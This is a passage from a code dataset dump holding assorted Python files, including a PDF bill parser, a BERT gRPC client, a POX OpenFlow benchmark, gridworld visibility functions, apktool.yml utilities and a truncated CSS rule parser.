Optional[NameComponents]:\n logger = parent_logger.getChild(\"hyperoptic\")\n\n # Check for very old templates, used in 2017 to 2018.\n old_bill = _try_old_hyperoptic(text_boxes, logger)\n if old_bill:\n return old_bill\n\n # All Hyperoptic objects on the page are logos, not text. But Hypernews is fairly\n # specific, too.\n is_hyperoptic = \"Hypernews\\n\" in text_boxes\n\n # Older templates of the bills don't have \"Hypernews\", so we need to guess. 
If there's\n # a \"DD Ref\" field, and the following includes HYP, it's probably Hyperoptic.\n if not is_hyperoptic and \"DD Ref:\\n\" in text_boxes:\n dd_ref_idx = text_boxes.index(\"DD Ref:\\n\")\n dd_ref = text_boxes[dd_ref_idx + 1]\n is_hyperoptic = \"HYP\" in dd_ref\n\n if not is_hyperoptic:\n return None\n\n account_idx = text_boxes.index(\"Name:\\n\")\n account_holder_name = text_boxes[account_idx + 1].strip()\n\n date_idx = text_boxes.index(\"Bill date:\\n\")\n date_str = text_boxes[date_idx + 1]\n\n bill_date = datetime.datetime.strptime(date_str, \"%d %b %Y\\n\")\n\n return NameComponents(bill_date, \"Hyperoptic\", account_holder_name, \"Bill\",)\n","sub_path":"pdfrename/hyperoptic.py","file_name":"hyperoptic.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"19199588","text":"import logging\nimport multiprocessing\nimport numpy as np\nimport os\nimport time\n\nfrom gunpowder.caffe.net_io_wrapper import NetIoWrapper\nfrom gunpowder.ext import caffe\nfrom gunpowder.nodes.batch_filter import BatchFilter\nfrom gunpowder.producer_pool import ProducerPool, WorkersDied\nfrom gunpowder.roi import Roi\nfrom gunpowder.volume import VolumeTypes, Volume\n\nlogger = logging.getLogger(__name__)\n\nclass PredictProcessDied(Exception):\n pass\n\nclass Predict(BatchFilter):\n '''Augments the batch with the predicted affinities.\n '''\n\n def __init__(self, prototxt, weights, use_gpu=None):\n\n for f in [prototxt, weights]:\n if not os.path.isfile(f):\n raise RuntimeError(\"%s does not exist\"%f)\n\n # start prediction as a producer pool, so that we can gracefully exit if \n # anything goes wrong\n self.worker = ProducerPool([lambda gpu=use_gpu: self.__predict(gpu)], queue_size=1)\n self.batch_in = multiprocessing.Queue(maxsize=1)\n\n self.prototxt = prototxt\n self.weights = weights\n self.net_initialized = False\n\n def setup(self):\n self.worker.start()\n\n def teardown(self):\n self.worker.stop()\n\n def prepare(self, request):\n\n # remove request parts that we provide\n if VolumeTypes.PRED_AFFINITIES in request.volumes:\n del request.volumes[VolumeTypes.PRED_AFFINITIES]\n\n def process(self, batch, request):\n\n self.batch_in.put(batch)\n\n try:\n out = self.worker.get()\n except WorkersDied:\n raise PredictProcessDied()\n\n affs = out.volumes[VolumeTypes.PRED_AFFINITIES]\n affs.roi = request.volumes[VolumeTypes.PRED_AFFINITIES]\n affs.resolution = batch.volumes[VolumeTypes.RAW].resolution\n\n batch.volumes[VolumeTypes.PRED_AFFINITIES] = affs\n\n def __predict(self, use_gpu):\n\n if not self.net_initialized:\n\n logger.info(\"Initializing solver...\")\n\n if use_gpu is not None:\n\n logger.debug(\"Predict process: using GPU %d\"%use_gpu)\n caffe.enumerate_devices(False)\n caffe.set_devices((use_gpu,))\n caffe.set_mode_gpu()\n caffe.select_device(use_gpu, False)\n\n self.net = caffe.Net(self.prototxt, self.weights, caffe.TEST)\n self.net_io = NetIoWrapper(self.net)\n self.net_initialized = True\n\n start = time.time()\n\n batch = self.batch_in.get()\n\n fetch_time = time.time() - start\n\n self.net_io.set_inputs({\n 'data': batch.volumes[VolumeTypes.RAW].data[np.newaxis,np.newaxis,:],\n })\n self.net.forward()\n output = self.net_io.get_outputs()\n\n predict_time = time.time() - start\n\n logger.info(\"Predict process: time=%f (including %f waiting for batch)\"%(predict_time, fetch_time))\n\n assert len(output['aff_pred'].shape) == 5, \"Got affinity prediction with unexpected number of 
dimensions, should be 1 (direction) + 3 (spatial) + 1 (batch, not used), but is %d\"%len(output['aff_pred'].shape)\n batch.volumes[VolumeTypes.PRED_AFFINITIES] = Volume(output['aff_pred'][0], Roi(), (1,1,1))\n\n return batch\n","sub_path":"gunpowder/caffe/nodes/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"525125035","text":"import wikipedia\n\n\nclass Wikipedia:\n \"\"\"Class used for the media wiki API REST requests\"\"\"\n\n def __init__(self, query):\n self.query = query\n\n def __repr__(self):\n '''Method to print the media wiki destination message'''\n\n return self.query\n\n def get_request(self):\n '''method which uses the mediawiki client to request the API'''\n place = ''\n wikipedia.set_lang(\"fr\")\n try: # two first sentences\n place = wikipedia.summary(f\"{self.query}\", sentences=2)\n except wikipedia.exceptions.DisambiguationError as e:\n try:\n place = wikipedia.summary(e.options[0], sentences=2)\n except wikipedia.exceptions.DisambiguationError as e:\n place = wikipedia.summary(e.options[1], sentences=2)\n except IndexError:\n print(\"error\")\n place = {\"error\": \"no result\"}\n return place\n","sub_path":"controler/wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"38525253","text":"\nfrom .run_squad import process_inputs, process_result, process_output\nimport grpc \nimport json\nimport os\nimport requests\nfrom . import tokenization\nimport tensorflow as tf\nfrom tensorflow_serving.apis import prediction_service_pb2_grpc, predict_pb2\n\ntf1 = tf.compat.v1\n\nclass Client(object): \n\n def __init__(self, hostport): \n self.hostport = hostport\n self.headers = { \"Content-type\": \"application/json\" }\n self.channel = grpc.insecure_channel(self.hostport)\n self.stub = prediction_service_pb2_grpc.PredictionServiceStub(self.channel)\n self.model_request = predict_pb2.PredictRequest() \n\n def predict(self, input_data, _id):\n \n self.generate_test_file(input_data, _id) \n self.process_inputs(_id) \n\n record_iterator = tf1.python_io.tf_record_iterator(path='./app/inputs/{}/eval.tf_record'.format(_id))\n\n self.model_request.model_spec.name = 'bert-qa'\n\n all_results = []\n\n for string_record in record_iterator:\n \n self.model_request.inputs['examples'].CopyFrom(\n tf.make_tensor_proto(\n string_record,\n dtype=tf.string,\n shape=[1]\n )\n )\n \n result_future = self.stub.Predict.future(self.model_request, 30.0) \n raw_result = result_future.result().outputs\n all_results.append(process_result(raw_result))\n\n result = process_output(all_results, self.examples, self.features, input_data, _id)\n return json.dumps(result)\n\n def process_inputs(self, _id):\n self.examples, self.features = process_inputs(_id)\n\n\n def generate_test_file(self, input_data, _id): \n with open('./app/inputs/{}/input.json'.format(_id), 'w') as outfile:\n json.dump(input_data, outfile) ","sub_path":"app/bert_client/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"19118826","text":"#!/usr/bin/env python\n#\n# Script: pox_flowmod.py\n# Description:\n# Pox module to test flow install performance\n\nimport time\n\nimport pox.openflow.libopenflow_01 as of\nfrom pox.core import core\nfrom pox.lib.revent import 
*\nfrom pox.lib.addresses import IPAddr, IPAddr6, EthAddr\n\nlog = core.getLogger()\n\nin_time = None\nrm_time = None\n\nTRIALS = 100\n\nINSTALL = 0\nREMOVE = 1\ncurrent = INSTALL\n\nins = []\nrms = []\ncount = 0\n\ndef install(dp):\n global in_time\n global current\n\n log.info(\"Installing flow\")\n msg = of.ofp_flow_mod()\n msg.command = of.OFPFC_ADD\n msg.priority = 1\n msg.match = of.ofp_match()\n msg.match.nw_src = IPAddr(\"192.168.2.101\")\n msg.match.nw_dst = IPAddr(\"192.168.2.102\")\n msg.match.dl_type = 0x800\n msg.actions.append(of.ofp_action_output(port=1))\n \n current = INSTALL\n in_time = time.time()\n dp.send(msg)\n msg = of.ofp_barrier_request()\n dp.send(msg)\n \ndef remove(dp):\n global rm_time\n global current\n\n log.info(\"Removing flow\")\n msg = of.ofp_flow_mod()\n msg.priority = 1\n msg.command = of.OFPFC_DELETE_STRICT\n msg.match = of.ofp_match()\n msg.match.nw_src = IPAddr(\"192.168.2.101\")\n msg.match.nw_dst = IPAddr(\"192.168.2.102\")\n msg.match.dl_type = 0x800\n msg.actions.append(of.ofp_action_output(port=1))\n\n current = REMOVE\n rm_time = time.time()\n dp.send(msg)\n msg = of.ofp_barrier_request()\n dp.send(msg)\n \ndef handleConnectionUp(event):\n log.info(\"DPID {0} is online\".format(event.dpid))\n install(event.connection)\n \ndef handleBarrierIn(event):\n global ins\n global rms\n global count\n\n log.info(\"--barrier in\")\n\n if current == INSTALL:\n elapsed = time.time() - in_time\n s = \"install\"\n else:\n elapsed = time.time() - rm_time\n s = \"remove\"\n\n t = round(elapsed * 1000, 3)\n log.info(\"Done {0}: {1}\".format(s, t))\n\n if current == INSTALL:\n ins.append(t)\n remove(event.connection)\n else:\n count += 1\n rms.append(t)\n if count < TRIALS:\n install(event.connection)\n else:\n ins.sort()\n rms.sort()\n log.info(\"Install:\\n Median: {0}, 95th: {1}\".format(ins[int(len(ins) * 0.5)],\n ins[int(len(ins) * .95)]))\n\n log.info(\"Remove:\\n Median: {0}, 95th: {1}\".format(rms[int(len(rms) * 0.5)],\n rms[int(len(rms) * .95)]))\n\n \ndef launch():\n core.openflow.addListenerByName(\"ConnectionUp\", handleConnectionUp)\n core.openflow.addListenerByName(\"BarrierIn\", handleBarrierIn)\n log.info(\"Pox flowmod perf test online\")\n","sub_path":"ocean/perf/pox_flowmod.py","file_name":"pox_flowmod.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"435700515","text":"def count_ngrams(sequence, N):\r\n freq = {}\r\n length = len(sequence)\r\n\r\n for i in range(0, length-N+1):\r\n w = sequence[i:i+N]\r\n if w not in freq:\r\n freq[w] = 0\r\n freq[w] += 1\r\n return freq\r\n","sub_path":"Ngrams.py","file_name":"Ngrams.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"296444174","text":"from typing import Optional\n\nimport numpy as np\nimport numpy.random as rnd\nfrom typing_extensions import Protocol # python3.7 compatibility\n\nfrom gym_gridverse.geometry import (\n Area,\n Position,\n StrideDirection,\n diagonal_strides,\n)\nfrom gym_gridverse.grid import Grid\nfrom gym_gridverse.rng import get_gv_rng_if_none\nfrom gym_gridverse.utils.raytracing import cached_compute_rays_fancy\n\n\nclass VisibilityFunction(Protocol):\n def __call__(\n self,\n grid: Grid,\n position: Position,\n *,\n rng: Optional[rnd.Generator] = None,\n ) -> np.ndarray:\n ...\n\n\ndef full_visibility(\n grid: Grid,\n position: Position, # pylint: disable = unused-argument\n 
*,\n rng: Optional[rnd.Generator] = None, # pylint: disable = unused-argument\n) -> np.ndarray:\n\n return np.ones((grid.height, grid.width), dtype=bool)\n\n\ndef partial_visibility(\n grid: Grid,\n position: Position,\n *,\n rng: Optional[rnd.Generator] = None, # pylint: disable=unused-argument\n) -> np.ndarray:\n\n if position.y != grid.height - 1:\n # gym-minigrid does not handle this case, and we are not currently\n # generalizing it\n raise NotImplementedError\n\n visibility = np.zeros((grid.height, grid.width), dtype=bool)\n visibility[position.y, position.x] = True # agent\n\n # front\n x = position.x\n for y in range(position.y - 1, -1, -1):\n visibility[y, x] = visibility[y + 1, x] and grid[y + 1, x].transparent\n\n # right\n y = position.y\n for x in range(position.x + 1, grid.width):\n visibility[y, x] = visibility[y, x - 1] and grid[y, x - 1].transparent\n\n # left\n y = position.y\n for x in range(position.x - 1, -1, -1):\n visibility[y, x] = visibility[y, x + 1] and grid[y, x + 1].transparent\n\n # top left\n positions = diagonal_strides(\n Area(\n (0, position.y - 1),\n (0, position.x - 1),\n ),\n StrideDirection.NW,\n )\n for p in positions:\n visibility[p.y, p.x] = (\n (grid[p.y + 1, p.x].transparent and visibility[p.y + 1, p.x])\n or (grid[p.y, p.x + 1].transparent and visibility[p.y, p.x + 1])\n or (\n grid[p.y + 1, p.x + 1].transparent\n and visibility[p.y + 1, p.x + 1]\n )\n )\n\n # top right\n positions = diagonal_strides(\n Area(\n (0, position.y - 1),\n (position.x + 1, grid.width - 1),\n ),\n StrideDirection.NE,\n )\n for p in positions:\n visibility[p.y, p.x] = (\n (grid[p.y + 1, p.x].transparent and visibility[p.y + 1, p.x])\n or (grid[p.y, p.x - 1].transparent and visibility[p.y, p.x - 1])\n or (\n grid[p.y + 1, p.x - 1].transparent\n and visibility[p.y + 1, p.x - 1]\n )\n )\n\n return visibility\n\n\ndef minigrid_visibility(\n grid: Grid,\n position: Position,\n *,\n rng: Optional[rnd.Generator] = None, # pylint: disable = unused-argument\n) -> np.ndarray:\n\n if position.y != grid.height - 1:\n # gym-minigrid does not handle this case, and we are not currently\n # generalizing it\n raise NotImplementedError\n\n visibility = np.zeros((grid.height, grid.width), dtype=bool)\n visibility[position.y, position.x] = True # agent\n\n for y in range(grid.height - 1, -1, -1):\n for x in range(grid.width - 1):\n if visibility[y, x] and grid[y, x].transparent:\n visibility[y, x + 1] = True\n if y > 0:\n visibility[y - 1, x] = True\n visibility[y - 1, x + 1] = True\n\n for x in range(grid.width - 1, 0, -1):\n if visibility[y, x] and grid[y, x].transparent:\n visibility[y, x - 1] = True\n if y > 0:\n visibility[y - 1, x] = True\n visibility[y - 1, x - 1] = True\n\n return visibility\n\n\ndef raytracing_visibility(\n grid: Grid,\n position: Position,\n *,\n rng: Optional[rnd.Generator] = None, # pylint: disable=unused-argument\n) -> np.ndarray:\n\n area = Area((0, grid.height - 1), (0, grid.width - 1))\n rays = cached_compute_rays_fancy(position, area)\n\n counts_num = np.zeros((area.height, area.width), dtype=int)\n counts_den = np.zeros((area.height, area.width), dtype=int)\n\n for ray in rays:\n light = True\n for pos in ray:\n if light:\n counts_num[pos.y, pos.x] += 1\n\n counts_den[pos.y, pos.x] += 1\n\n light = light and grid[pos].transparent\n\n # TODO add as parameter to function\n visibility = counts_num > 0 # at least one ray makes it\n # visibility = counts_num > 0.5 * counts_den # half of the rays make it\n # visibility = counts_num > 0.1 * counts_den # 10% of 
the rays make it\n    # visibility = counts_num > 1  # at least 2 rays make it\n\n    return visibility\n\n\ndef stochastic_raytracing_visibility(  # TODO add test\n    grid: Grid,\n    position: Position,\n    *,\n    rng: Optional[rnd.Generator] = None,\n) -> np.ndarray:\n    rng = get_gv_rng_if_none(rng)\n\n    area = Area((0, grid.height - 1), (0, grid.width - 1))\n    rays = cached_compute_rays_fancy(position, area)\n\n    counts_num = np.zeros((area.height, area.width), dtype=int)\n    counts_den = np.zeros((area.height, area.width), dtype=int)\n\n    for ray in rays:\n        light = True\n        for pos in ray:\n            if light:\n                counts_num[pos.y, pos.x] += 1\n\n            counts_den[pos.y, pos.x] += 1\n\n            light = light and grid[pos].transparent\n\n    probs = np.nan_to_num(counts_num / counts_den)\n    # a cell should be visible with probability equal to the fraction of rays that reach it,\n    # i.e. it is visible when that fraction is at least as large as the random draw\n    visibility = probs >= rng.random(probs.shape)\n    return visibility\n\n\ndef factory(name: str) -> VisibilityFunction:\n\n    if name == 'full_visibility':\n        return full_visibility\n\n    if name == 'partial_visibility':\n        return partial_visibility\n\n    if name == 'minigrid_visibility':\n        return minigrid_visibility\n\n    if name == 'raytracing_visibility':\n        return raytracing_visibility\n\n    if name == 'stochastic_raytracing_visibility':\n        return stochastic_raytracing_visibility\n\n    raise ValueError(f'invalid visibility function name {name}')\n","sub_path":"gym_gridverse/envs/visibility_functions.py","file_name":"visibility_functions.py","file_ext":"py","file_size_in_byte":6246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"376215328","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 29 16:39:11 2018\n\n@author: tirilkoplandtrondsen\n\"\"\"\n\n# Exercise 3\n# A program that calculates the animal population t years from today.\n\n\ndef regnPopulasjonsendring(): # Defines the calculation function\n    bgammel = int(input(\"Hvor stor er den nåværende dyrebefolkningen? \"))\n    t = int(input(\"Over hvor mange år skjer populasjonsendringen? \"))\n    ps = input(\"Stiger populasjonen? ja / nei \")\n    \n    if ps == 'ja':\n        p = float(input(\"Hvor mange prosent stiger populasjonen?\"))\n        bny = (bgammel * (1+ (p/100)) **t )\n        print (\"Det er \" + str(bny) + \" etter \" + str(t) + \" år.\" )\n        \n    elif ps == 'nei':\n        p = float(input(\"Hvor mange prosent synker populasjonen? \"))\n        bny = (bgammel * (1 - (p/100))**t)\n        print ( \"Det er \" + str(bny) + \" etter \" + str(t) + \" år.\")\n        \n    else:\n        print (\"Feil inndata, prøv på nytt.\")\n\nwhile 1: # Main loop\n    regnPopulasjonsendring()\n    spm = input(\"Vil du regne det ut en gang til? ja / nei \")\n    if spm == 'nei':\n        break","sub_path":"oppgave3.py","file_name":"oppgave3.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"359713805","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nEXAM 16 February 2021 - Exercise 1.\nPOLYNOMIAL INTERPOLATION\n\"\"\"\n\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\ndef pol_lagrange(nodes, j):\n    zeros = np.zeros_like(nodes)\n    \n    if j == 0:\n        zeros = nodes[1:]\n    else:\n        zeros = np.append(nodes[:j], nodes[j+1:])\n    \n    num = np.poly(zeros)\n    den = np.polyval(num, nodes[j])\n    return num / den\n\ndef lagrange_interpl(nodes, ordinates, points):\n    n = nodes.size\n    m = points.size\n    L = np.empty((n, m))\n    \n    for k in range(n):\n        k_pol = pol_lagrange(nodes, k)\n        L[k, :] = np.polyval(k_pol, points)\n    \n    return np.dot(ordinates, L)\n\na = 0\nb = 2\nx_axis = np.linspace(a, b)\nfunction = lambda x : np.cos(math.pi * x) + np.sin(math.pi * x)\nnodes = np.array([1, 1.5, 1.75])\n\npol_intrpl = lagrange_interpl(nodes, function(nodes), x_axis)\n\nplt.plot(x_axis, function(x_axis), x_axis, pol_intrpl, nodes, function(nodes), '*')\nplt.legend([\"f(x)\", \"Polinomio interpolante\", \"Nodi equispaziati\"])\nplt.show()\n\n'''\nObserving that the interpolation error at x = 0.75 is 0, it is easy to see that x = 0.75 already behaves as\nan interpolation node for the computed polynomial. Therefore recomputing the interpolating polynomial with\nthis point added to the input nodes will have no effect.\n'''\nx = 0.75\nresto = abs(function(x) - lagrange_interpl(nodes, function(nodes), np.array([x])))\nprint(resto)\n\nnodes = np.append(nodes, x)  # np.append returns a new array, so the result must be reassigned\npol_intrpl2 = lagrange_interpl(nodes, function(nodes), x_axis)\n\nplt.plot(x_axis, function(x_axis), x_axis, pol_intrpl2, nodes, function(nodes), '*')\nplt.legend([\"f(x)\", \"Polinomio interpolante 2\", \"Nodi equispaziati\"])\nplt.show()","sub_path":"simulazioni/a16-02-21/es2.py","file_name":"es2.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"638249450","text":"# -*- coding: utf-8 -*-\n# Author:xiaohei\n# CreateTime:2018-11-16\n#\n# All operations for apktool.yml\n#\n#\n\nimport os\nimport os.path\nfrom xml.etree import ElementTree as ET\nfrom xml.etree.ElementTree import SubElement\nfrom xml.etree.ElementTree import Element\nfrom xml.etree.ElementTree import ElementTree\nfrom xml.dom import minidom\nimport log_utils\nimport file_utils\n\n\ndef parse_version_info(ymlPath):\n    \"\"\"\n    parse versionCode and versionName in apktool.yml\n    \"\"\"\n\n    if not os.path.exists(ymlPath):\n        log_utils.warning(\"the apktool.yml is not exists \" + ymlPath)\n        return (\"0\", \"1.0.0\")\n\n    ymlFile = open(ymlPath, 'r')\n    lines = ymlFile.readlines()\n    ymlFile.close()\n\n    versionCode = \"0\"\n    versionName = \"1.0.0\"\n\n    for line in lines:\n        if 'versionCode' in line:\n            versionCode = line.replace('versionCode:', '').strip().replace(\"'\", \"\")\n\n        elif 'versionName' in line:\n            versionName = line.replace('versionName:', '').strip().replace(\"'\", \"\")\n\n    return (versionCode, versionName)\n\n\ndef modify_version_info(ymlPath, newPackageName, versionCode, versionName, minSdkVersion, targetSdkVersion,\n                        maxSdkVersion):\n    \"\"\"\n    modify version info in apktool.yml\n    \"\"\"\n\n    if not os.path.exists(ymlPath):\n        log_utils.warning(\"the apktool.yml is not exists \" + ymlPath)\n        return\n\n    minSdkStr = None\n    targetSdkStr = 
None\n    maxSdkStr = None\n\n    if minSdkVersion != None:\n        minSdkStr = \"minSdkVersion: '\" + minSdkVersion + \"'\"\n\n    if targetSdkVersion != None:\n        targetSdkStr = \"targetSdkVersion: '\" + targetSdkVersion + \"'\"\n\n    if maxSdkVersion != None:\n        maxSdkStr = \"maxSdkVersion: '\" + maxSdkVersion + \"'\"\n\n    ymlFile = open(ymlPath, 'r')\n    lines = ymlFile.readlines()\n    ymlFile.close()\n\n    newLines = []\n    for line in lines:\n        if 'versionCode' in line and versionCode is not None:\n            newLines.append(\"  versionCode: '\" + versionCode + \"'\\n\")\n        elif 'versionName' in line and versionName is not None:\n            newLines.append(\"  versionName: \" + versionName + \"\\n\")\n        elif 'sdkInfo' in line:\n            continue\n        elif 'minSdkVersion' in line:\n            if minSdkVersion == None:\n                minSdkStr = line.strip()\n        elif 'targetSdkVersion' in line:\n            if targetSdkVersion == None:\n                targetSdkStr = line.strip()\n        elif 'maxSdkVersion' in line:\n            if maxSdkVersion == None:\n                maxSdkStr = line.strip()\n        elif 'renameManifestPackage' in line and ('null' not in line):\n            newLines.append(\"  renameManifestPackage: \" + newPackageName + \"\\n\")\n\n        else:\n            newLines.append(line)\n\n    if minSdkVersion != None or targetSdkVersion != None or maxSdkVersion != None:\n        newLines.append('sdkInfo:\\n')\n        if minSdkVersion != None:\n            newLines.append(\"  \" + minSdkStr + \"\\n\")\n\n        if targetSdkVersion != None:\n            newLines.append(\"  \" + targetSdkStr + \"\\n\")\n\n        # if maxSdkVersion != None:\n        #     newLines.append(\"  \"+maxSdkStr + \"\\n\")\n\n    content = ''\n    for line in newLines:\n        content = content + line\n\n    ymlFile = open(ymlPath, 'w')\n    ymlFile.write(content)\n    ymlFile.close()\n\n\ndef add_compress_regx(ymlPath, compressRegx):\n    \"\"\"\n    remove matched compress types from doNotCompress tag\n    \"\"\"\n\n    if compressRegx == None or len(compressRegx) == 0:\n        return\n\n    if not os.path.exists(ymlPath):\n        log_utils.warning(\"the apktool.yml is not exists \" + ymlPath)\n        return\n\n    ymlFile = open(ymlPath, 'r')\n    lines = ymlFile.readlines()\n    ymlFile.close()\n\n    handlingCompress = False\n\n    newLines = []\n    for line in lines:\n\n        if 'doNotCompress:' in line:\n            handlingCompress = True\n            newLines.append(line)\n        elif handlingCompress and line.startswith('-'):\n            currLine = line[1:].strip()\n            matchs = [c for c in compressRegx if c == currLine]\n            if len(matchs) <= 0:\n                newLines.append(line)\n\n        else:\n            handlingCompress = False\n            newLines.append(line)\n\n    content = ''\n    for line in newLines:\n        content = content + line\n\n    ymlFile = open(ymlPath, 'w')\n    ymlFile.write(content)\n    ymlFile.close()\n\n\ndef add_uncompress_regx(ymlPath, uncompressRegx):\n    \"\"\"\n    add uncompress types into doNotCompress\n    \"\"\"\n\n    if uncompressRegx == None or len(uncompressRegx) == 0:\n        return\n\n    if not os.path.exists(ymlPath):\n        log_utils.warning(\"the apktool.yml is not exists \" + uncompressRegx)\n        return\n\n    ymlFile = open(ymlPath, 'r')\n    lines = ymlFile.readlines()\n    ymlFile.close()\n\n    handlingCompress = False\n\n    existsUnCompressSet = list()\n\n    for line in lines:\n\n        if 'doNotCompress:' in line:\n            handlingCompress = True\n        elif handlingCompress and line.startswith('-'):\n            currLine = line[1:].strip()\n            existsUnCompressSet.append(currLine)\n\n        else:\n            handlingCompress = False\n\n    appendItems = list()\n    for uncompressItem in uncompressRegx:\n\n        matchItems = [c for c in existsUnCompressSet if c == uncompressItem]\n\n        if len(matchItems) > 0:\n            continue\n\n        appendItems.append(uncompressItem)\n\n    if len(appendItems) > 0:\n\n        newLines = list()\n        for line in lines:\n\n            if 'doNotCompress:' in 
line:\n newLines.append(line)\n\n for aitem in appendItems:\n newLines.append(\"- \" + aitem + \"\\n\")\n\n else:\n newLines.append(line)\n\n content = ''\n for line in newLines:\n content = content + line\n\n ymlFile = open(ymlPath, 'w')\n ymlFile.write(content)\n ymlFile.close()\n\n\ndef modify_doNotCompress(ymlPath, uncompressRegx):\n \"\"\"\n modify uncompress types into doNotCompress\n \"\"\"\n\n if uncompressRegx == None or len(uncompressRegx) == 0:\n return\n\n if not os.path.exists(ymlPath):\n log_utils.warning(\"the apktool.yml is not exists \" + uncompressRegx)\n return\n\n ymlFile = open(ymlPath, 'r')\n lines = ymlFile.readlines()\n ymlFile.close()\n\n if 'arsc' not in uncompressRegx:\n uncompressRegx.insert(0, 'arsc')\n\n newLines = list()\n inDoNotCompress = False\n for line in lines:\n\n if 'doNotCompress:' in line:\n newLines.append(line)\n inDoNotCompress = True\n\n for aitem in uncompressRegx:\n newLines.append(\"- \" + aitem + \"\\n\")\n\n elif line.strip().startswith('-') and inDoNotCompress:\n continue\n\n else:\n inDoNotCompress = False\n newLines.append(line)\n\n content = ''\n for line in newLines:\n content = content + line\n\n ymlFile = open(ymlPath, 'w')\n ymlFile.write(content)\n ymlFile.close()\n","sub_path":"client/android/scripts/yml_utils.py","file_name":"yml_utils.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"128689538","text":"import platform\nimport subprocess\n\nimport os\nimport cat_service\n\n\ndef main():\n\tprint_header()\n\n\tfolder = get_or_create_output_folder()\n\tprint(f'Found or created folder: {folder}')\n\n\tdownload_cats(folder)\n\tdisplay_cats(folder)\n\n\ndef print_header():\n\tprint('---------------------------')\n\tprint(' CAT FACTORY APP')\n\tprint('---------------------------')\n\n\ndef get_or_create_output_folder():\n\tfolder = 'cat_pictures'\n\n\tbase_path = os.path.dirname(__file__)\n\tfull_path = os.path.join(base_path, folder)\n\n\tif not os.path.exists(full_path) or not os.path.isdir(full_path):\n\t\tprint(f'Creating new directory at {full_path}')\n\t\tos.mkdir(full_path)\n\n\treturn full_path\n\n\ndef download_cats(folder):\n\tprint('Contacting server to download cats...')\n\tfor i in range(1, 9):\n\t\tname = f'lolcat_{i}'\n\t\tprint(f'Downloading cat {name}')\n\t\tcat_service.get_cat(folder, name)\n\n\tprint('Done.')\n\n\ndef display_cats(folder):\n\tif platform.system() == 'Darwin':\n\t\tsubprocess.call(['open', folder])\n\telif platform.system() == 'Linux':\n\t\tsubprocess.call(['xdg-open', folder])\n\telif platform.system() == 'Windows':\n\t\tsubprocess.call(['explorer', folder])\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"06_cat_factory_app/cat_factory.py","file_name":"cat_factory.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"234699996","text":"import copy\n\nimport tinycss2\nfrom tinycss2.ast import (Comment, CurlyBracketsBlock, HashToken, IdentToken,\n LiteralToken, WhitespaceToken, FunctionBlock)\n\n\nclass BadCss(Exception):\n pass\n\nclass CssRule:\n def __init__(self, rule):\n self.rule = self._clean_comments(rule)\n print(self.rule)\n self.rule = self._remove_whitespace_nodes(self.rule)\n self.rule_types = self._determine_rule_type(self.rule)\n self.typeless_rule = self._remove_type_nodes(self.rule)\n if type(self.typeless_rule[0]) is not HashToken or self.typeless_rule[0].value != \"lpChat\":\n 
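# Illustrative note, inferred from this class's own methods rather than external docs:\n            # this branch is reached only when the rule's first selector token is not the '#lpChat'\n            # root. A rule such as '#lpChat .header { color: red; }' passes this check, and\n            # _generate_selector_string below rewrites its selector to '$lpWindowElementId .header'.\n            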
print(\"Bad Rule: \", self.typeless_rule)\n raise BadCss(\"First element in heirarchy should be the '#lpChat' selector.\")\n self.selector_string = self._generate_selector_string(self.typeless_rule)\n self.curly_brackets_node = self._get_curly_brackets_block(self.typeless_rule)\n self.css_properties = self._get_css_properties_string(self.curly_brackets_node)\n\n def _clean_comments(self, rule):\n remove_nodes = []\n for node in rule:\n if type(node) is Comment:\n remove_nodes.append(node)\n for node in remove_nodes:\n rule.remove(node)\n return rule\n\n\n def _remove_whitespace_nodes(self, rule):\n remove_nodes = []\n for node in rule:\n if type(node) is WhitespaceToken:\n remove_nodes.append(node)\n else:\n break\n for node in reversed(rule):\n if type(node) is WhitespaceToken:\n remove_nodes.append(node)\n else:\n break\n for node in remove_nodes:\n rule.remove(node)\n return rule\n \n def _set_rule_type(self, rule_types, new_value):\n if new_value not in rule_types:\n rule_types.append(new_value)\n return rule_types\n \n def _determine_rule_type(self, rule):\n rule_types = []\n for token_index in range(len(rule)):\n token = rule[token_index]\n if type(token) is IdentToken:\n if \"mobile\" in token.value:\n rule_types = self._set_rule_type(rule_types, \"mobile\")\n elif \"desktop\" in token.value:\n rule_types = self._set_rule_type(rule_types, \"desktop\")\n if len(rule_types) == 0:\n rule_types = [\"mobile\", \"desktop\"]\n return rule_types\n \n def _remove_type_nodes(self, rule):\n remove_nodes = []\n for token_index in range(len(rule)):\n token = rule[token_index]\n if type(token) is IdentToken:\n if \"mobile\" in token.value or \"desktop\" in token.value:\n remove_nodes.append(rule[token_index - 1])\n remove_nodes.append(token)\n remove_nodes.append(rule[token_index + 1])\n for node in remove_nodes:\n rule.remove(node)\n return rule\n\n def _generate_selector_string(self, rule):\n selector_string = \"\"\n for node in rule:\n if type(node) is 